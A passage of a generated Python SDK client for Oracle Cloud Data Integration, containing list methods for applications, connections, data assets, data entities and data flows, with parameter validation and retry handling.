is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ApplicationSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_applications.py.html>`__ to see an example of how to use the list_applications API.
"""
resource_path = "/workspaces/{workspaceId}/applications"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"name",
"identifier",
"fields",
"limit",
"page",
"sort_order",
"sort_by",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_applications got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"name": kwargs.get("name", missing),
"identifier": self.base_client.generate_collection_format_param(kwargs.get("identifier", missing), 'multi'),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ApplicationSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ApplicationSummaryCollection")
def list_connection_validations(self, workspace_id, **kwargs):
"""
Retrieves a list of connection validations within the specified workspace.
:param str workspace_id: (required)
The workspace ID.
:param str key: (optional)
Used to filter by the key of the object.
:param str name: (optional)
Used to filter by the name of the object.
:param str identifier: (optional)
Used to filter by the identifier of the object.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ConnectionValidationSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_connection_validations.py.html>`__ to see an example of how to use the list_connection_validations API.
"""
resource_path = "/workspaces/{workspaceId}/connectionValidations"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"key",
"name",
"identifier",
"fields",
"page",
"limit",
"sort_by",
"sort_order",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_connection_validations got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"key": kwargs.get("key", missing),
"name": kwargs.get("name", missing),
"identifier": kwargs.get("identifier", missing),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ConnectionValidationSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ConnectionValidationSummaryCollection")
def list_connections(self, workspace_id, data_asset_key, **kwargs):
"""
Retrieves a list of all connections.
:param str workspace_id: (required)
The workspace ID.
:param str data_asset_key: (required)
Used to filter by the data asset key of the object.
:param str name: (optional)
Used to filter by the name of the object.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str type: (optional)
Type of the object to filter the results with.
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ConnectionSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_connections.py.html>`__ to see an example of how to use the list_connections API.
"""
resource_path = "/workspaces/{workspaceId}/connections"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"name",
"page",
"limit",
"fields",
"type",
"sort_by",
"sort_order",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_connections got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"dataAssetKey": data_asset_key,
"name": kwargs.get("name", missing),
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"type": kwargs.get("type", missing),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ConnectionSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ConnectionSummaryCollection")
def list_data_assets(self, workspace_id, **kwargs):
"""
Retrieves a list of all data asset summaries.
:param str workspace_id: (required)
The workspace ID.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str type: (optional)
Type of the object to filter the results with.
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str name: (optional)
Used to filter by the name of the object.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DataAssetSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_data_assets.py.html>`__ to see an example of how to use the list_data_assets API.
"""
resource_path = "/workspaces/{workspaceId}/dataAssets"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"page",
"limit",
"fields",
"type",
"sort_by",
"sort_order",
"name",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_data_assets got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"type": kwargs.get("type", missing),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing),
"name": kwargs.get("name", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="DataAssetSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="DataAssetSummaryCollection")
def list_data_entities(self, workspace_id, connection_key, schema_resource_name, **kwargs):
"""
Lists a summary of data entities from the data asset using the specified connection.
:param str workspace_id: (required)
The workspace ID.
:param str connection_key: (required)
The connection key.
:param str schema_resource_name: (required)
The schema resource name used for retrieving schemas.
:param str name: (optional)
Used to filter by the name of the object.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str type: (optional)
Type of the object to filter the results with.
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param list[str] name_list: (optional)
Used to filter by the name of the object.
:param bool is_pattern: (optional)
Specifies whether the entity search is a pattern search.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DataEntitySummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_data_entities.py.html>`__ to see an example of how to use the list_data_entities API.
"""
resource_path = "/workspaces/{workspaceId}/connections/{connectionKey}/schemas/{schemaResourceName}/dataEntities"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"name",
"page",
"type",
"limit",
"fields",
"sort_by",
"sort_order",
"opc_request_id",
"name_list",
"is_pattern"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_data_entities got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"connectionKey": connection_key,
"schemaResourceName": schema_resource_name
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"name": kwargs.get("name", missing),
"page": kwargs.get("page", missing),
"type": kwargs.get("type", missing),
"limit": kwargs.get("limit", missing),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing),
"nameList": self.base_client.generate_collection_format_param(kwargs.get("name_list", missing), 'multi'),
"isPattern": kwargs.get("is_pattern", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="DataEntitySummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="DataEntitySummaryCollection")
def list_data_flow_validations(self, workspace_id, **kwargs):
"""
Retrieves a list of data flow validations within the specified workspace.
:param str workspace_id: (required)
The workspace ID.
:param str key: (optional)
Used to filter by the key of the object.
:param str name: (optional)
Used to filter by the name of the object.
:param str identifier: (optional)
Used to filter by the identifier of the object.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DataFlowValidationSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_data_flow_validations.py.html>`__ to see an example of how to use the list_data_flow_validations API.
"""
resource_path = "/workspaces/{workspaceId}/dataFlowValidations"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"key",
"name",
"identifier",
"fields",
"page",
"limit",
"sort_by",
"sort_order",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_data_flow_validations got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"key": kwargs.get("key", missing),
"name": kwargs.get("name", missing),
"identifier": kwargs.get("identifier", missing),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="DataFlowValidationSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="DataFlowValidationSummaryCollection")
def list_data_flows(self, workspace_id, **kwargs):
"""
Retrieves a list of data flows in a project or folder.
:param str workspace_id: (required)
The workspace ID.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str folder_id: (optional)
Unique key of the folder.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str name: (optional)
Used to filter by the name of the object.
:param list[str] identifier: (optional)
Used to filter by the identifier of the object.
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting-related parameters are ignored when the `query` parameter is present (a search operation sorts by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DataFlowSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_data_flows.py.html>`__ to see an example of how to use list_data_flows API.
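A minimal filtering sketch (the folder key is an illustrative placeholder; `client` and `workspace_id` are assumed to be set up already):

.. code-block:: python

    response = client.list_data_flows(
        workspace_id,
        folder_id="example-folder-key",    # hypothetical folder key
        fields=["name", "identifier"],     # restrict the fields returned per object
        sort_by="DISPLAY_NAME")
    for data_flow in response.data.items:
        print(data_flow.name, data_flow.identifier)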
"""
resource_path = "/workspaces/{workspaceId}/dataFlows"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"folder_id",
"fields",
"name",
"identifier",
"limit",
"page",
"sort_order",
"sort_by"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_data_flows got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"folderId": kwargs.get("folder_id", missing),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"name": kwargs.get("name", missing),
"identifier": self.base_client.generate_collection_format_param(kwargs.get("identifier", missing), 'multi'),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="DataFlowSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="DataFlowSummaryCollection")
def list_dependent_objects(self, workspace_id, application_key, **kwargs):
"""
Retrieves a list of all dependent objects for a specific application.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str name: (optional)
Used to filter by the name of the object.
:param list[str] identifier: (optional)
Used to filter by the identifier of the published object.
:param list[str] type: (optional)
Used to filter by the type of the object. The type can be
suffixed with the optional filter operator InSubtree.
For Data Integration APIs, a filter based on the type Task is used.
:param str type_in_subtree: (optional)
Used in association with the type parameter. If the value is true,
all subtypes of the given type parameter are considered.
If the value is false, subtypes are not considered. The default is false.
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
